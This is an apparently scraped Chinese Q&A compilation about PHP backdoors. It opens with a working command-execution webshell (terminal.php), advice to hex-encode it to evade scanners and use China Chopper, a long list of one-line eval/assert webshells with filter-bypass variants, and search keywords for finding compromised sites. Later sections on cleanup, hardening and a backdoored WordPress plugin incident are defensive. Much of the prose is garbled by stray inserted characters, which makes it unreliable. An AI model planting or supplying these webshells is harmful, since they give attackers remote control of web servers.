php後門代碼
① php網站怎麼留後門
在php.ini中設置開啟exec() system()等函數
創建 terminal.php 文件如下
<?php
!(isset($_POST['parma'])&&$_POST['parma']!='')&&exit("請輸入需要執行的shell命令");
!(isset($_POST['type'])&&$_POST['type']!='')&&exit("請輸入調用函數的類型");
$parma=$_POST['parma'];
switch($_POST['type']){
case'system':
returnsystem($parma);
break;
case'exec':
returnexec($parma,$return);
break;
case'passthru':
returnpassthru($parma);
break;
default:
exit;
}
?>
② php怎麼設置巧妙的後門程序,保護自己的的代碼,防止對方
這個東西也可以再進行加密成十六進制的,這樣就防止了對方查詢危險函數了,這個東西放在一個文件裡面,這要你能夠放問道這個差衫代碼就行,然後你下載中國菜刀,然後使勁砍
當然了,代纖慶知碼這東西是只要給對方,對方可毀消以無限制的復制的,很難杜絕
③ 一個有意思的 PHP 一句話後門,怎麼破
<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php ($_=@$_GET1).@$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?>//容錯代碼
<?php assert($_POST1);?>//使用Lanker一句話客戶端的專家模式執行相關的PHP語句
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用這個後,使用菜刀一句話客戶端在
配置連接的時候在"配置"一欄輸入*/:<O>h=@eval_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
//繞過<?限制的一句話
<script language="php">@eval_r($_POST[sb])</script>
④ PHP網站後門怎麼清除
一般都是網站程序存在漏洞或者伺服器存在漏洞而被攻擊了
網站掛馬是每個網站最頭痛的問題,解決辦法:1.在程序中很容易找到掛馬的代碼,直接刪除,或則將你沒有傳伺服器的源程序覆蓋一次但反反復復被掛就得深入解決掉此問題了。但這不是最好的解決辦法。最好的方法還是找專業做安全的來幫你解決掉
聽朋友說 SineSafe 不錯 你可以去看看。
清馬+修補漏洞=徹底解決
所謂的掛馬,就是黑客通過各種手段,包括sql注入,網站敏感文件掃描,伺服器漏洞,網站程序0day, 等各種方法獲得網站管理員賬號,然後登陸網站後台,通過資料庫 備份/恢復 或者上傳漏洞獲得一個webshell。利用獲得的webshell修改網站頁面的內容,向頁面中加入惡意轉向代碼。也可以直接通過弱口令獲得伺服器或者網站FTP,然後直接對網站頁面直接進行修改。當你訪問被加入惡意代碼的頁面時,你就會自動的訪問被轉向的地址或者下載木馬病毒
清馬
1、找掛馬的標簽,比如有<script language="javascript" src="網馬地址"></script>或<iframe width=420 height=330 frameborder=0
scrolling=auto src=網馬地址></iframe>,或者是你用360或病殺毒軟體攔截了網馬網址。SQL資料庫被掛馬,一般是JS掛馬。
2、找到了惡意代碼後,接下來就是清馬,如果是網頁被掛馬,可以用手動清,也可以用批量清,網頁清馬比較簡單,這里就不詳細講,現在著重講一下SQL資料庫清馬,用這一句語句「update 表名 set 欄位名=replace(欄位名,'aaa','')」, 解釋一下這一句子的意思:把欄位名里的內容包含aaa的替換成空,這樣子就可以一個表一個表的批量刪除網馬。
在你的網站程序或資料庫沒有備份情況下,可以實行以上兩步驟進行清馬,如果你的網站程序有備份的話,直接覆蓋原來的文件即可。
修補漏洞(修補網站漏洞也就是做一下網站安全。)
1、修改網站後台的用戶名和密碼及後台的默認路徑。
2、更改資料庫名,如果是ACCESS資料庫,那文件的擴展名最好不要用mdb,改成ASP的,文件名也可以多幾個特殊符號。
3、接著檢查一下網站有沒有注入漏洞或跨站漏洞,如果有的話就相當打上防注入或防跨站補丁。
4、檢查一下網站的上傳文件,常見了有欺騙上傳漏洞,就對相應的代碼進行過濾。
5、盡可能不要暴露網站的後台地址,以免被社會工程學猜解出管理用戶和密碼。
6、寫入一些防掛馬代碼,讓框架代碼等掛馬無效。
7、禁用FSO許可權也是一種比較絕的方法。
8、修改網站部分文件夾的讀寫許可權。
9、如果你是自己的伺服器,那就不僅要對你的網站程序做一下安全了,而且要對你的伺服器做一下安全也是很有必要了!
⑤ 什麼是php webshell
webshell是web入侵的腳本攻擊工具。簡單的說來,webshell就是一個asp或php木馬後門,黑客在入侵了一個網站後,常常在將這些asp或php木馬後門文件放置在游跡緩網站伺服器的web目錄中,與正常的網頁文件混在一起。然後黑客就可以用web的方式,通過asp或php木馬後門控制網站伺服器,包括上傳下載文件、查看資料庫、執行任意程序命令等。
為了更好理解webshell我們學習兩個概念:
什神模么是「木馬」?「木馬」全稱是「特洛伊木馬(Trojan Horse)」,原指古希臘士兵藏在木馬內進入敵方城市從而佔領敵方城市的故事。在Internet上,「特洛伊木馬」指一些程序設計人員在其可從網路上下載(Download)的應用程序或游戲中,包含了可以控制用戶的計算機系統的程序,可能造成用戶的系統被破壞甚至癱瘓。
什麼是後門?大家都知道,一台計算機上有65535個埠,那麼如果把計算機看作是一間屋子,那麼這65535個埠就可以它看做是計算機為了與外界連接所開的65535扇門。每個門的背後都是一個服務。有的門是主人特地打開迎接客人的(提供服務),有的門是主人為了出去訪問客人而開設的(訪問遠程服務)——理論上,剩下的其他門都該是關閉著的,但偏偏由於各種原因,很多門都是開啟的。於是就有好事者進入,主人的隱私被刺探,生活被打擾,甚至屋裡的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是「後門」。
webshell的優點
webshell 最大的優點就是可以穿越防火牆,由於與被控制的伺服器或遠程主機交換的數據都是通過80埠傳遞的,因此不會被防火牆攔截。並且使用webshell一般不會在系統日誌中留下記錄,只會在網站的web日誌中留下一些數據提交記錄,沒有經驗的管理員是很難看出入侵痕跡的。
如何尋找webshel:
1,腳本攻擊SQL注入
2,使用注入工具
3,在瀏覽器里打開網路,輸入搜索關鍵詞"在州磨本頁操作不需要FSO支持&"或者"一次只能執行一個操作",然後點擊搜索,很快就可以看到檢索到了大量的查詢結果.
⑥ 我下載了一個PHP加Mysql的源碼 怎麼檢查有沒有後門
樓主你好,源碼下載後,用殺毒軟體喚啟殺下,看有沒有木馬
然後你可以檢查看下代碼中有沒有可疑的js代碼,也有可能是馬
程序的bug這個我就不說了,難,任何程序都可能有bug,只殲鏈游是發現與沒發現的問題
如果是很牛的人的源碼,人家在程序裡面放了馬,藏得很深的話,估計找出來也難,建議還是用出名一點的源碼程序!要麼自己開發氏銷或請人開發!
⑦ 用D盾檢查網站時發現可疑代碼。求高手幫忙分析是不是被掛後門了
是的一個是獲取id還有一個是獲取密碼
⑧ 如何查找php木馬後門高級篇
試滲侍試騰訊渣銷電腦管家,雲查殺引擎+金山雲查殺引擎+小紅傘本地查殺引擎,至於趨勢本地查殺引擎則支持如喊游需要自由選擇是否開啟。
提供最佳的查殺效果,保證能有效的查殺最新的病毒木馬,小紅傘引擎可自動更新至最新狀態,方便省事
⑨ 如何查看一個PHP源碼是否有後門
1、很難,因為有的後門會加處理的,很難掃描出來的,要一句一句去排除;
2、可以把修改日期跟大部分日期不一樣的文件過一遍。
⑩ PHP的93個WordPress插件有後門
因為93 個 WordPress 主題和插件包含後門,從而使得攻擊者可以完全控制網站。攻擊者總共入侵了 AccessPress 的 40 個主題和 53 個插件,AccessPress 是 WordPress 插件的開發者,用於超過 360,000 個活動網站。
該攻擊是由 Jetpack 的研究人員發現的,Jetpack 是 WordPress 網站安全和優化工具的創建者,他們發現 PHP 後門已被添加到主題和插件中。
Jetpack 認為外部威脅攻擊者入侵了 AccessPress 網站以破壞軟體並感染更多的 WordPress 網站。
一旦管理員在他們的網站上安裝了一個受感染的 AccessPress 產品,就會在主主題目錄中添加一個新的「initial.php」文件,並將其包含在主「functions.php」文件中。該文件包含一個 base64 編碼的有效負載,它將 webshel l 寫入「./wp-includes/vars.php」文件。惡意代碼通過解碼並將其注入「vars.php」文件來完成後門安裝,實質上是讓攻擊者遠程式控制制受感染的站點。
檢測這種威脅的唯一方法是使用核心文件完整性監控解決方案,因為惡意軟體會刪除「initial.php」文件釋放器以掩蓋其蹤跡。
我受到影響嗎?
如果您在您的網站上安裝了其中一個受感染的插件或主題,則刪除/替換/更新它們不會根除任何可能通過它植入的 webshel l。
因此,建議網站管理員通過執行以下操作來掃描他們的網站是否存在入侵跡象:
Jetpack 提供了以下 YARA 規則,可用於檢查站點是否已被感染並檢測 dropper 和已安裝的 webshel l:
原文鏈接:PHP的93個WordPress插件有後門